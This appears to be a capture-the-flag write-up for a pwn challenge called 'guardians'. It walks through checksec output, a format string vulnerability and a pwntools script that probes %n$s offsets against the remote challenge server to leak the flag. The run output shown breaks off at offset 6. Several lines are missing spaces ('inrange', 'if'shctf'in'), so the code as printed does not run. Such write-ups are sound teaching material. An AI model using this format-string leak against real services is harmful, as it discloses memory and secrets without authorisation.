$ checksec guardians
[*] '/home/kali/ctfs/shctf/pwn/guardians-of-the-galaxy/guardians'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Let’s look at what happens when you run that binary given to us.
$ ./guardians
Error, please message admins with 'infinity_error'.
This error is because the binary is probably trying to reference a flag.txt within its directory that doesn’t exist. Let’s create one and run it again:
$ touch flag.txt && echo"FLAGHERE" > flag.txt$ ./guardians
Does Quill manage to win the dance battle?
There, we got it to work locally. Since we know that this is problem a format string vulnerability from the “find a successful distraction format” part of the description, let’s assume that the vulnerability is it writing our input to the stack with printf(). We will need to work our way up the stack with the format %n$s, where n is the decimal index of the argument you want, and s is the printf() specifier for a string of characters. I wrote this Python3/pwntools script here to achieve this loop:
from pwn import *
for i inrange(0, 100):
p = remote('0.cloud.chals.io', 12690)
log.info(f"Trying offset {i}...")
p.sendline(bytes(('%' + str(i) + '$s'), encoding='utf-8'))
output = p.recvS()
if'shctf'in output:
log.success(output)
break
p.close()
As you can see, it will send a UTF-8 encoded format string, with str(i) being the looping variable. If its output contains the flag, the loop breaks and the script will stop. Let’s run it:
$ python3 exp.py
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 0...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 1...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 2...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 3...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 4...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 5...
[*] Closed connection to 0.cloud.chals.io port 12690
[+] Opening connection to 0.cloud.chals.io on port 12690: Done
[*] Trying offset 6...
[+] Does Quill manage to win the dance battle?
Oh no, Ronano has seen through the distraction!
